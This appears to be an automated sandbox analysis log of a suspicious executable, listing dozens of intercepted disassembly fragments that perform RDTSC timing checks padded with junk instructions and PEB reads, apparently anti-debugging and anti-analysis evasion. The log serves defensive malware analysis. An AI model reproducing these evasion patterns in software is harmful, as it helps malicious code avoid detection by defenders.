    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17AC76F second address: 17AC7A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F519CD4C37Bh 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f popad 0x00000010 pushad 0x00000011 jns 00007F519CD4C37Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 jnl 00007F519CD4C376h 0x0000001f jmp 00007F519CD4C37Bh 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17AC7A5 second address: 17AC7B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F519CFC89B6h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17AC7B5 second address: 17AC7BB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17AADD4 second address: 17AADE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F519CFC89B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17AADE0 second address: 17AADE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17AF555 second address: 17AF565 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F519CFC89C2h 0x00000008 jl 00007F519CFC89B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17B6EC5 second address: 17B6EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F519CD4C376h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jo 00007F519CD4C376h 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17B6EE2 second address: 17B6EE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17B7202 second address: 17B7228 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop ebx 0x0000000c jc 00007F519CD4C37Ch 0x00000012 jc 00007F519CD4C376h 0x00000018 push eax 0x00000019 push edx 0x0000001a jl 00007F519CD4C376h 0x00000020 jng 00007F519CD4C376h 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17B7228 second address: 17B7273 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C7h 0x00000007 jbe 00007F519CFC89B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F519CFC89C2h 0x00000016 jmp 00007F519CFC89BDh 0x0000001b push edx 0x0000001c jc 00007F519CFC89B6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17C20FB second address: 17C210A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F519CD4C376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17C210A second address: 17C2134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F519CFC89C8h 0x0000000c popad 0x0000000d jo 00007F519CFC89CAh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17C2134 second address: 17C2138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 16E6066 second address: 16E60AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C7h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F519CFC89BCh 0x00000011 push eax 0x00000012 jmp 00007F519CFC89C0h 0x00000017 pop eax 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b jp 00007F519CFC89B6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17C7FBD second address: 17C7FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17C7B65 second address: 17C7B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17CF755 second address: 17CF75B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17D7FEB second address: 17D8002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CFC89C3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17D8002 second address: 17D8006 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E1DAC second address: 17E1DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E1DB2 second address: 17E1DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E0537 second address: 17E053D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E053D second address: 17E0543 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E0543 second address: 17E0549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E0549 second address: 17E055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C381h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E055E second address: 17E0562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E0825 second address: 17E0829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E0829 second address: 17E0834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E0834 second address: 17E084F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C383h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E084F second address: 17E085F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F519CFC89B6h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E085F second address: 17E0876 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E0876 second address: 17E087B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E0A0C second address: 17E0A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E0B57 second address: 17E0B60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E0B60 second address: 17E0B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E0D04 second address: 17E0D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E0D09 second address: 17E0D22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C385h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E0FFC second address: 17E1000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E1000 second address: 17E1023 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C385h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F519CD4C37Ah 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E1023 second address: 17E102B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E102B second address: 17E1031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E4CA4 second address: 17E4CAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 17E4CAC second address: 17E4CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1821DE6 second address: 1821DF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F519CFC89B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1821DF5 second address: 1821DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1821DFC second address: 1821E06 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F519CFC89BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 18346A1 second address: 18346A7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 18346A7 second address: 18346C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F519CFC89C8h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1834811 second address: 1834816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1902736 second address: 190273B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1902872 second address: 1902887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C37Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1902887 second address: 190288B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1902CFB second address: 1902D1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C382h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F519CD4C37Ch 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1902D1D second address: 1902D29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F519CFC89B6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1902D29 second address: 1902D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F519CD4C382h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F519CD4C37Eh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1902D6F second address: 1902D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F519CFC89B6h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1902D7D second address: 1902D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1902D82 second address: 1902DA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C7h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1902DA1 second address: 1902DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1902DA5 second address: 1902DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1903216 second address: 1903238 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F519CD4C37Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F519CD4C380h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1903238 second address: 1903248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 19050BD second address: 19050D1 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F519CD4C376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 19050D1 second address: 19050D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 19050D7 second address: 19050DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 1907C7A second address: 1907C81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90008 second address: 6E9001B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9001B second address: 6E90021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90021 second address: 6E90099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F519CD4C37Ah 0x00000010 or ch, FFFFFFF8h 0x00000013 jmp 00007F519CD4C37Bh 0x00000018 popfd 0x00000019 mov eax, 43692F2Fh 0x0000001e popad 0x0000001f mov dword ptr [esp], ebp 0x00000022 pushad 0x00000023 push ecx 0x00000024 jmp 00007F519CD4C387h 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushfd 0x0000002d jmp 00007F519CD4C37Fh 0x00000032 and ax, 671Eh 0x00000037 jmp 00007F519CD4C389h 0x0000003c popfd 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90099 second address: 6E900FA instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a movzx esi, di 0x0000000d popad 0x0000000e mov eax, dword ptr fs:[00000030h] 0x00000014 jmp 00007F519CFC89BEh 0x00000019 sub esp, 18h 0x0000001c pushad 0x0000001d mov di, cx 0x00000020 jmp 00007F519CFC89BAh 0x00000025 popad 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 jmp 00007F519CFC89BEh 0x0000002d call 00007F519CFC89C2h 0x00000032 mov ch, 41h 0x00000034 pop ebx 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a movsx edi, ax 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E900FA second address: 6E901A0 instructions: 0x00000000 rdtsc 0x00000002 call 00007F519CD4C382h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushfd 0x0000000c jmp 00007F519CD4C37Eh 0x00000011 sbb ecx, 18A88B68h 0x00000017 jmp 00007F519CD4C37Bh 0x0000001c popfd 0x0000001d pop ecx 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 movsx edi, cx 0x00000024 movzx eax, dx 0x00000027 popad 0x00000028 mov ebx, dword ptr [eax+10h] 0x0000002b jmp 00007F519CD4C389h 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F519CD4C37Ch 0x00000038 add eax, 430BE028h 0x0000003e jmp 00007F519CD4C37Bh 0x00000043 popfd 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 push eax 0x00000048 jmp 00007F519CD4C381h 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F519CD4C37Dh 0x00000055 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E901A0 second address: 6E901B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CFC89BCh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E901B0 second address: 6E9025B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [762C06ECh] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F519CD4C37Dh 0x00000015 jmp 00007F519CD4C37Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F519CD4C388h 0x00000021 xor cl, 00000078h 0x00000024 jmp 00007F519CD4C37Bh 0x00000029 popfd 0x0000002a popad 0x0000002b test esi, esi 0x0000002d jmp 00007F519CD4C386h 0x00000032 jne 00007F519CD4D1E2h 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ebx, 180B7EF0h 0x00000040 pushfd 0x00000041 jmp 00007F519CD4C389h 0x00000046 and ecx, 1BF8EC76h 0x0000004c jmp 00007F519CD4C381h 0x00000051 popfd 0x00000052 popad 0x00000053 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9025B second address: 6E902D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CFC89C7h 0x00000009 and ax, D1AEh 0x0000000e jmp 00007F519CFC89C9h 0x00000013 popfd 0x00000014 mov cx, 4E37h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, edi 0x0000001c pushad 0x0000001d mov ebx, ecx 0x0000001f pushad 0x00000020 mov ah, A8h 0x00000022 call 00007F519CFC89C7h 0x00000027 pop esi 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F519CFC89C5h 0x00000032 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E902D5 second address: 6E90350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F519CD4C387h 0x00000009 sbb cx, A27Eh 0x0000000e jmp 00007F519CD4C389h 0x00000013 popfd 0x00000014 mov ch, DCh 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, edi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F519CD4C389h 0x00000021 jmp 00007F519CD4C37Bh 0x00000026 popfd 0x00000027 mov si, E79Fh 0x0000002b popad 0x0000002c call dword ptr [76290B60h] 0x00000032 mov eax, 75A0E5E0h 0x00000037 ret 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b pushad 0x0000003c popad 0x0000003d mov ax, bx 0x00000040 popad 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90350 second address: 6E90356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E90356 second address: 6E9035A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9035A second address: 6E903B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000044h 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e call 00007F519CFC89BFh 0x00000013 movzx esi, di 0x00000016 pop edx 0x00000017 popad 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov edi, 6005C580h 0x00000021 pushfd 0x00000022 jmp 00007F519CFC89C9h 0x00000027 adc cx, 7386h 0x0000002c jmp 00007F519CFC89C1h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E903B7 second address: 6E903BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E903BD second address: 6E903C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E903C1 second address: 6E9044F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a jmp 00007F519CD4C382h 0x0000000f pushfd 0x00000010 jmp 00007F519CD4C382h 0x00000015 or esi, 3F233888h 0x0000001b jmp 00007F519CD4C37Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [esp], edi 0x00000025 pushad 0x00000026 mov di, ax 0x00000029 pushfd 0x0000002a jmp 00007F519CD4C380h 0x0000002f sub al, FFFFFFE8h 0x00000032 jmp 00007F519CD4C37Bh 0x00000037 popfd 0x00000038 popad 0x00000039 push dword ptr [eax] 0x0000003b jmp 00007F519CD4C386h 0x00000040 mov eax, dword ptr fs:[00000030h] 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E9044F second address: 6E90455 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\random(5).exeRDTSC instruction interceptor: First address: 6E904B6 second address: 6E904C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C37Eh 0x00000009 rdtsc
